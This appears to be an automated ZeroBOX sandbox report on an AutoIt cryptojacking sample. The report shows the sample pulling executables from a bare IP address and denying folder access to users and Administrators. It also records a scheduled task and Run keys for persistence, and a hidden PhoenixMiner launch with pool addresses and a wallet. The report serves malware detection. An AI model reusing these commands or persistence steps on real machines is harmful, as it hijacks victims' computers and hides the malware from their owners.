Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 9, 2021, 12:41 p.m.	March 9, 2021, 12:43 p.m.

Size	909.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`c49dd8107b3624f824efe4f88cb3f792`
SHA256	`64bb6aaca4c1ba6b5d4cfe771985587158a453288ef1da1c7cb084b90c3e7cc5`
CRC32	`B9522724`
ssdeep	`24576:SAHnh+eWsN3skA4RV1Hom2KXMmHacfmG5:Vh+ZkldoPK8Yacr`
Yara	IsPE32 - (no description) IsWindowsGUI - (no description) HasDebugData - DebugData Check HasRichSignature - Rich Signature Check AutoIt - www.autoitscript.com/site/autoit/ CryptGenKey_Zero - CryptGenKey Zero FindFirstVolume_Zero - FindFirstVolume Zero inject_thread - Code injection with CreateRemoteThread in a remote process network_http - Communications over HTTP escalate_priv - Escalade priviledges screenshot - Take screenshot keylogger - Run a keylogger win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile Str_Win32_Winsock2_Library - Match Winsock 2 API library declaration Str_Win32_Wininet_Library - Match Windows Inet API library declaration Str_Win32_Internet_API - Match Windows Inet API call Str_Win32_Http_API - Match Windows Http API call Process_Snapshot_Kill_Zero - Process Kill Zero PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero Device_Check_Zero - Device Check Zero

this.exe "C:\Users\test22\AppData\Local\Temp\this.exe"
2648
- This.exe C:\ProgramData\NetWork\This.exe
  2092
  - cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
    2856
    - icacls.exe icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
      2976
  - cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
    844
    - icacls.exe icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
      2064
  - cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
    2764
    - icacls.exe icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
      2232
  - cmd.exe C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
    2416
    - schtasks.exe schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
      108
  - PhoenixMiner.exe "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
    1536
- cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
  260
  - icacls.exe icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
    872
- cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
  1816
  - icacls.exe icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
    2072
- cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
  2620
  - icacls.exe icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
    2480
- cmd.exe C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
  916
  - schtasks.exe schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
    3016
- PhoenixMiner.exe "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
  3028

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
194.147.115.117	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49199 -> 194.147.115.117:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.101:49199 -> 194.147.115.117:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49199 -> 194.147.115.117:80	2019935	ET INFO AutoIt User Agent Executable Request	A Network Trojan was detected
TCP 194.147.115.117:80 -> 192.168.56.101:49199	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.147.115.117:80 -> 192.168.56.101:49199	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 194.147.115.117:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.101:49203 -> 194.147.115.117:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49203 -> 194.147.115.117:80	2019935	ET INFO AutoIt User Agent Executable Request	A Network Trojan was detected
TCP 192.168.56.101:49203 -> 194.147.115.117:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 194.147.115.117:80 -> 192.168.56.101:49203	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.147.115.117:80 -> 192.168.56.101:49203	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 194.147.115.117:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.101:49205 -> 194.147.115.117:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49205 -> 194.147.115.117:80	2019935	ET INFO AutoIt User Agent Executable Request	A Network Trojan was detected
TCP 192.168.56.101:49205 -> 194.147.115.117:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 194.147.115.117:80 -> 192.168.56.101:49205	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.147.115.117:80 -> 192.168.56.101:49205	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW March 9, 2021, 12:41 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW March 9, 2021, 12:41 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 9, 2021, 12:41 p.m.			0	0
IsDebuggerPresent March 9, 2021, 12:41 p.m.			0	0

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: processed file: C:\ProgramData\NetWork console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: processed file: C:\ProgramData\NetWork console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: Invalid parameter "Administrators:(R,REA,RA))" console_handle: 0x0000000b	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: SUCCESS: The scheduled task "SrartupWindows" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: processed file: C:\ProgramData\NetWork console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: Invalid parameter "Administrators:(R,REA,RA))" console_handle: 0x0000000b	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: processed file: C:\ProgramData\NetWork console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: Successfully processed 1 files; Failed processing 0 files console_handle: 0x00000007	1	1
WriteConsoleW March 9, 2021, 12:41 p.m.	buffer: WARNING: The task name "SrartupWindows" already exists. Do you want to replace it (Y/N)? console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 9, 2021, 12:41 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://194.147.115.117/zzztop/PhoenixMiner.exe
suspicious_features	Connection to IP address				suspicious_request	GET http://194.147.115.117/zzztop/This.exe

Performs some HTTP requests (2 events)

request	GET http://194.147.115.117/zzztop/PhoenixMiner.exe
request	GET http://194.147.115.117/zzztop/This.exe

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 9, 2021, 12:41 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b62000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory March 9, 2021, 12:41 p.m.	process_identifier: 2092 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b62000 process_handle: 0xffffffff	1	0	0

Creates executable files on the filesystem (2 events)

file	C:\ProgramData\NetWork\PhoenixMiner.exe
file	C:\ProgramData\NetWork\This.exe

Creates a suspicious process (5 events)

cmdline	schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
cmdline	C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
cmdline	C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
cmdline	C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
cmdline	C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"

Drops a binary and executes it (1 event)

file	C:\ProgramData\NetWork\PhoenixMiner.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 9, 2021, 12:41 p.m.	show_type: 0 filepath_r: C:\ProgramData\NetWork\PhoenixMiner.exe parameters: -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0 filepath: C:\ProgramData\NetWork\PhoenixMiner.exe	1	1	0
ShellExecuteExW March 9, 2021, 12:41 p.m.	show_type: 0 filepath_r: C:\ProgramData\NetWork\PhoenixMiner.exe parameters: -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0 filepath: C:\ProgramData\NetWork\PhoenixMiner.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 58 events)

Time & API	Arguments	Status	Return
Process32FirstW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: [System Process] process_identifier: 0	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: System process_identifier: 4	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: smss.exe process_identifier: 224	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: csrss.exe process_identifier: 300	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: wininit.exe process_identifier: 348	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: csrss.exe process_identifier: 364	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: winlogon.exe process_identifier: 396	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: services.exe process_identifier: 440	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: lsass.exe process_identifier: 456	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: lsm.exe process_identifier: 464	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 568	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 640	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 700	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 776	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: audiodg.exe process_identifier: 892	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 968	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 264	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: spoolsv.exe process_identifier: 820	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 292	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 1192	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: srvany.exe process_identifier: 1244	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: taskhost.exe process_identifier: 1284	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: KMService.exe process_identifier: 1324	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: conhost.exe process_identifier: 1376	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: sppsvc.exe process_identifier: 1800	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: svchost.exe process_identifier: 1876	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: dwm.exe process_identifier: 1496	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: explorer.exe process_identifier: 1848	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: WmiPrvSE.exe process_identifier: 1916	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: pw.exe process_identifier: 2816	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: SearchIndexer.exe process_identifier: 2940	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: SearchProtocolHost.exe process_identifier: 1480	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: SearchFilterHost.exe process_identifier: 3040	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: SearchProtocolHost.exe process_identifier: 2120	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: mobsync.exe process_identifier: 1068	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: pw.exe process_identifier: 2368	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: taskhost.exe process_identifier: 1276	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: this.exe process_identifier: 2648	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 1772	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: This.exe process_identifier: 2092	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: rundll32.exe process_identifier: 2716	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: cmd.exe process_identifier: 260	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: cmd.exe process_identifier: 1816	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: conhost.exe process_identifier: 2036	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: cmd.exe process_identifier: 2620	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: conhost.exe process_identifier: 2976	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: cmd.exe process_identifier: 916	1	1
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: conhost.exe process_identifier: 2740	1	1

An executable file was downloaded by the process this.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile March 9, 2021, 12:41 p.m.	buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ðDJÐJÐJÐþ ÛÐDÐþ ÙÐñÐþ ØÐUÐÔ1íÐBÐqÏ)ÑBÐqÏ.ÑaÐqÏ/ÑÊÐÊ/ÑKÐQÐKÐCé¹ÐNÐQÐZÐ$Ì/ÑOÐÝÏ.ÑeÐnáÐ_ÐJ+Ð8ÐÝÏ/ÑÐÝÏÑKÐØÏÕÐKÐÝÏ(ÑKÐRichJÐPEdk_ð"Ð=Ê; 6@ày`àp\<pÜPyà°v0v`y´}`jj(0#ià=ðp.textÌÎ=Ð= `.rdataTÚ2à=Ü2Ô=@@.data´âÀp`°p@À.pdata0v°vxv@@.tls0yx@À.gfids<@yx@@.rsrcàPyx@@.reloc´}`y~x@B request_handle: 0x00cc000c	1	1	0
InternetReadFile March 9, 2021, 12:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $sRüÁRüÁRüÁCÁPüÁÌ²;ÁSüÁ_@#ÁaüÁ_@ÁãüÁ_@ÁgüÁ[jÁ[üÁ[joÁwüÁRýÁrüÁçÁüÁç#ÁSüÁ_@'ÁSüÁRkÁSüÁç"ÁSüÁRichRüÁPELè»©_à"àR ð@@@@ÌÀ\|l4qÀ+ PK @ð.textÝßà `.rdataýðþä@@.datatðRâ@À.rsrcl4@@.reloc4qrÄ @B request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00019000', u'virtual_address': u'0x000c8000', u'entropy': 7.307910374133275, u'name': u'.rsrc', u'virtual_size': u'0x00018e6c'}

entropy

7.30791037413

description

A section with a high entropy has been found

Expresses interest in specific running processes (1 event)

process

phoenixminer.exe

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (13 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002e0 process_name: rundll32.exe process_identifier: 2044		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: is32bit.exe process_identifier: 2236		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: is32bit.exe process_identifier: 2236		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: is32bit.exe process_identifier: 2236		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: is32bit.exe process_identifier: 2236		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: is32bit.exe process_identifier: 2236		0	0
Process32NextW March 9, 2021, 12:41 p.m.	snapshot_handle: 0x000002d8 process_name: is32bit.exe process_identifier: 2236		0	0

Potentially malicious URLs were found in the process memory dump (50 out of 992 events)

url	https://curl.haxx.se/docs/http-cookies.html
url	http://www.openssl.org/support/faq.html
url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://users.ocsp.d-trust.net03
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.e-szigno.hu/SZSZ/0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://www.certplus.com/CRL/class3.crl0
url	http://logo.verisign.com/vslogo.gif0
url	http://www.acabogacia.org/doc0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	https://www.catcert.net/verarrel
url	http://www.sk.ee/cps/0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	http://crl.chambersign.org/chambersroot.crl0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0
url	http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url	http://www.certicamara.com/certicamaraca.crl0
url	http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url	http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url	http://www.post.trust.ie/reposit/cps.html0
url	http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url	http://www2.public-trust.com/crl/ct/ctroot.crl0
url	http://www.certicamara.com0
url	http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url	http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url	http://www.comsign.co.il/cps0
url	http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url	http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url	http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0

Yara rule detected in process memory (50 out of 999 events)

description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Communication using dga	rule	network_dga
description	Escalade priviledges	rule	escalate_priv
description	Take screenshot	rule	screenshot
description	Run a keylogger	rule	keylogger
description	Steal credential	rule	cred_local
description	Record Audio	rule	sniff_audio
description	APC queue tasks migration	rule	migrate_apc
description	Malware can spread east-west file	rule	spreading_file
description	Malware can spread east-west using share drive	rule	spreading_share
description	Create or check mutex	rule	win_mutex
description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	Match Winsock 2 API library declaration	rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration	rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Code injection with CreateRemoteThread in a remote process	rule	inject_thread
description	Create a windows service	rule	create_service
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications over P2P network	rule	network_p2p_win
description	Communications over HTTP	rule	network_http
description	File downloader/dropper	rule	network_dropper
description	Communications over FTP	rule	network_ftp

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
cmdline	C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (1 event)

host

194.147.115.117

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Installs itself for autorun at Windows startup (12 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application	reg_value	C:\ProgramData\NetWork\This.exe
cmdline	schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
cmdline	C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10

A stratum cryptocurrency mining command was executed (2 events)

cmdline	C:\ProgramData\NetWork\PhoenixMiner.exe -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
